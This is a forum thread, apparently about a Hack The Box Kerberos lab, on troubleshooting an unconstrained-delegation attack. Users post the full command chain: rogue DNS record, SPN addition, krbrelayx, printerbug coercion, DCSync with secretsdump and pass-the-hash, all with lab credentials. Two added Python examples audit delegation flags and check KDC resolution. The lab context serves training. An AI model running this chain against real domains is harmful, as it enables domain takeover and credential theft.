Kerberos attacks

hi all. I beg you, help me, encourage me to the correct answer. I am running the “KERBEROS ATTACKS” module. I ran into difficulties in the “Unconstrained Delegation - Users” section. I need help solving a task, maybe I’m doing something wrong or I misunderstood the task and am applying the data from the task

callum.dixon:C@lluMDIXON has an unrestricted delegation set, and carole.rose:jasmine has a universal write on top of callum.dixon. Using this information, try to compromise the domain and read the contents of C:\flag.txt on DC01.

so let’s go in order what I do

  1. fake dns
I add to /etc/hosts roguecomputer.inlanefreight.local
python dnstool.py -u INLANEFREIGHT.LOCAL\\carole.rose -p jasmine -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.99.99.99 --action add 10.129.205.35
  2. create the SPN of the target user (callum.dixon)
python addspn.py -u inlanefreight.local\\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local
  3. Run krbrelayx.py with the password of callum.dixon
python krbrelayx.py -p C@lluMDIXON
  4. Run printerbug.py as carole.rose to get the ticket
python printerbug.py inlanefreight.local/carole.rose:jasmine@10.129.205.35 roguecomputer.inlanefreight.local
and I catch the carole.rose ticket in the session where krbrelayx.py is running
  5. Exporting the ticket
export KRB5CCNAME=./DC01\$@INLANEFREIGHT.LOCAL_krbtgt@INLANEFREIGHT.LOCAL.ccache
  6. I’m trying to reset hashes using secretsdump.py to get the admin hash and I get an error
secretsdump.py -k -no-pass dc01.inlanefreight.local
Impacket v0.12.0.dev1+20230907.33311.3f645107 - Copyright 2023 Fortra

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...

Okay, we understand that it may not be possible to perform DCSync. So I thought about stealing the flag using SMB, but it didn’t work; I just got an error when using the Kerberos ticket: “[-] [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused”. But if you connect with credentials, then naturally you get access, but not to the C drive :')
Please help me with the task.
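The task statement above says callum.dixon has unconstrained delegation set. On the defensive side, that is a userAccountControl flag (TRUSTED_FOR_DELEGATION, 0x80000) that can be audited. The following is an added example, not code from the thread or from the HTB module; the account records are constructed, and in practice they would come from an LDAP query for that flag. It decodes the flag bits, rates unconstrained delegation by account type, and separately reports privileged accounts (here marked by a constructed adminCount attribute) that lack the NOT_DELEGATED protection.

```python
# Added example: audit userAccountControl for unconstrained delegation.
# Flag values are the standard Active Directory userAccountControl bits.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",            # domain controllers
    0x80000: "TRUSTED_FOR_DELEGATION",         # unconstrained delegation
    0x100000: "NOT_DELEGATED",                 # "account is sensitive and cannot be delegated"
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",  # constrained delegation with protocol transition
}


def decode_uac(value: int) -> list[str]:
    """Return the names of the known flag bits set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def audit_delegation(records: list[dict]) -> list[tuple[str, str, str]]:
    """Findings as (sAMAccountName, severity, reason) for every account that is
    trusted for unconstrained delegation. A DC is expected to carry the flag;
    a user account with it (the task's callum.dixon case) is the high-risk one."""
    findings = []
    for rec in records:
        flags = decode_uac(rec["userAccountControl"])
        if "TRUSTED_FOR_DELEGATION" not in flags:
            continue
        name = rec["sAMAccountName"]
        if "SERVER_TRUST_ACCOUNT" in flags:
            findings.append((name, "info", "domain controller with unconstrained delegation (expected)"))
        elif "NORMAL_ACCOUNT" in flags:
            findings.append((name, "high", "user account with unconstrained delegation"))
        else:
            findings.append((name, "medium", "computer account with unconstrained delegation"))
    return findings


def unprotected_privileged(records: list[dict]) -> list[str]:
    """Privileged accounts (adminCount=1, a constructed marker here) whose TGTs
    could be captured by an unconstrained-delegation host because they are
    neither marked NOT_DELEGATED nor in Protected Users (not modelled here)."""
    return [
        rec["sAMAccountName"]
        for rec in records
        if rec.get("adminCount") == 1
        and "NOT_DELEGATED" not in decode_uac(rec["userAccountControl"])
    ]


# Constructed sample records (names from the task; flag values are illustrative).
SAMPLE_RECORDS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x2000 | 0x80000},
    {"sAMAccountName": "callum.dixon", "userAccountControl": 0x200 | 0x80000},
    {"sAMAccountName": "carole.rose", "userAccountControl": 0x200},
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000 | 0x80000},
    {"sAMAccountName": "administrator", "userAccountControl": 0x200, "adminCount": 1},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x200 | 0x100000, "adminCount": 1},
]

if __name__ == "__main__":
    for name, sev, reason in audit_delegation(SAMPLE_RECORDS):
        print(f"[{sev}] {name}: {reason}")
    for name in unprotected_privileged(SAMPLE_RECORDS):
        print(f"[mitigation] {name}: privileged but not marked 'sensitive and cannot be delegated'")
```

On the constructed records the audit flags callum.dixon as high severity and reports administrator as a privileged account without the NOT_DELEGATED bit; svc_backup, which carries the bit, is not reported.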

@Alt_F4 What command are you using to connect to the 10.129.205.35 machine? Could you please help me with this?

hi @tigerboy, if you connect without a ticket, you can connect using credentials with the following command:

smbclient.py carole.rose@dc01.inlanefreight.local

But this will not give you anything, because we need to get the admin hash, and we need to carry out an attack like the one in the section to reset the hashes.
If we add the options (-k -no-pass) to the command above, then we get the error “[-] [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused”

Well, if we reset the hash for a specific user, we get a combination of the errors above

secretsdump.py -k -no-pass dc01.inlanefreight.local -just-dc-user administrator
Impacket v0.12.0.dev1+20230907.33311.3f645107 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

@tigerboy Hello. I decided and pulled the flag. I had to combine the attack of this part and the previous task. I still don’t understand what the problem is with the Kerberos error in this module. In general, my solution is just to take the admin hash from the previous task and try to connect using some kind of impacket module. Good luck!

Have you made any changes to the system before running the above command? I am not receiving the connection refused error in the response.

Try adding additional options. Use -h to figure out what you need. Pay attention to the target and IP options.

Same problems as you when trying to perform a DC Sync.
Used the NT hash from the previous task in the end.
Was anyone able to complete this task following the instructions?

Was anyone able to get the flag? I have the same problem. What is the alternative? I have tried 2 different impacket tools, but still am not able to access dc01

smbclient.py should work. Of course it’s not the intended way. I have tried to open an issue with Support about this task, asking them to investigate why DC Sync does not work

Thanks for replying.

I tried using smbclient.py, but it didn’t work. I used the administrator account from the last activity and the dc01$ account, but none work. For carole it gives no results back. May I ask you the syntax you used?
Thank you

replied privately

hey man, would you be able to guide me with this? Seems there is a tech issue and I am not sure what the DC IP is … is it the same IP mentioned in the example?

if I’m not wrong, the DC is the target machine itself so you just spin up the target and that is the IP to use

When you issue the secretsdump command make sure you specify the -target-ip and the -dc-ip and the target domainname/user and it should work

If you try to issue the secretsdump command with just the domain name after adding it to the hosts file, it will not work, or at least it didn’t work for me unless I specified the -target-ip and the -dc-ip. In the exercise they are the same, but you still have to specify both.

Could you please PM me the command you used? Because it didn’t work for me. Maybe I did something wrong.

Sent it to you!! Hopefully it works out for you! Let me know if you still need help.


Does anybody know what the problem is? The commands execute successfully until krbrelayx.py -p C@lluMDIXON:

python dnstool.py -u INLANEFREIGHT.LOCAL\callum.dixon -p C@lluMDIXON -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.10.14.219 --action add 10.129.205.35

python addspn.py -u inlanefreight.local\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local

python krbrelayx.py -p C@llumDIXON

and I get this error and no ticket:

this is my /etc/hosts file:


This one was pretty frustrating. I had to convert callum.dixon’s password into an NTLM hash, then run sudo python krbrelayx.py -hashes : with the hash. After that I finally received the TGT and then exported the ticket. I then was able to DCSync with secretsdump.py -k -no-pass dc01.inlanefreight.local and get the Administrator’s hash; from there I could use evil-winrm with the hash.

did you get it to work?

When I did it, it worked for me using the commands in the module.
But the /etc/hosts file looks like the below:

10.129.x.y inlanefreight.local dc01.inlanefreight.local

So: First the IP, then the domain then the hostname.
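The “Connection error (INLANEFREIGHT.LOCAL:88)” reported earlier in the thread, and the two fixes offered (an /etc/hosts line that maps the IP to the domain name as well as the hostname, or passing -dc-ip explicitly), come down to one thing: Impacket’s Kerberos client connects to the realm name itself on port 88 unless a KDC address is supplied. The following added example (not code from the thread or from Impacket) reproduces that lookup against hosts-file text so the condition can be checked before running a tool. The hosts-file contents are constructed; the `probe` argument is optional so the logic can be exercised without a network.

```python
import socket
from typing import Callable, Optional

# Constructed hosts-file contents. The first matches the pattern people reported
# as failing (domain name absent); the second is the layout from the last post.
HOSTS_MISSING_DOMAIN = "10.129.205.35 dc01.inlanefreight.local\n"
HOSTS_OK = "10.129.205.35 inlanefreight.local dc01.inlanefreight.local\n"


def parse_hosts(text: str) -> dict[str, str]:
    """Map every hostname (lower-cased) in hosts-file text to its IP.
    Format is 'IP name [alias ...]'; '#' starts a comment."""
    mapping: dict[str, str] = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            mapping[name.lower()] = ip
    return mapping


def kdc_for_realm(realm: str, hosts: dict[str, str], dc_ip: Optional[str] = None) -> Optional[str]:
    """Where the Kerberos client will send AS/TGS requests: an explicit -dc-ip
    wins; otherwise the realm name (e.g. INLANEFREIGHT.LOCAL) must resolve."""
    if dc_ip:
        return dc_ip
    return hosts.get(realm.lower())


def tcp_probe(ip: str, port: int, timeout: float = 2.0) -> bool:
    """Real connectivity check (TCP connect); only used when passed as `probe`."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False


def check_kdc(realm: str, hosts: dict[str, str], dc_ip: Optional[str] = None,
              probe: Optional[Callable[[str, int], bool]] = None) -> tuple[bool, str]:
    """Return (ok, message). Fails on the two causes seen in the thread:
    the realm does not resolve, or the resolved KDC does not answer on 88."""
    ip = kdc_for_realm(realm, hosts, dc_ip)
    if ip is None:
        return False, (f"{realm} does not resolve: add it to /etc/hosts "
                       f"('<ip> {realm.lower()} <dc fqdn>') or pass -dc-ip")
    if probe is not None and not probe(ip, 88):
        return False, f"{ip}:88 not reachable (this is the 'Connection refused' case)"
    return True, f"KDC for {realm} is {ip}"


if __name__ == "__main__":
    for label, text in (("missing domain", HOSTS_MISSING_DOMAIN), ("ok", HOSTS_OK)):
        ok, msg = check_kdc("INLANEFREIGHT.LOCAL", parse_hosts(text))
        print(f"{label}: {'OK' if ok else 'FAIL'}: {msg}")
    # With -dc-ip the hosts file no longer matters for the KDC lookup:
    print(check_kdc("INLANEFREIGHT.LOCAL", parse_hosts(HOSTS_MISSING_DOMAIN), dc_ip="10.129.205.35"))
```

To check a live box, read /etc/hosts into `parse_hosts` and pass `probe=tcp_probe`; the message then distinguishes a resolution problem from a port 88 that is simply not answering, which is the same distinction the later replies in this thread draw between fixing the hosts file and specifying -dc-ip.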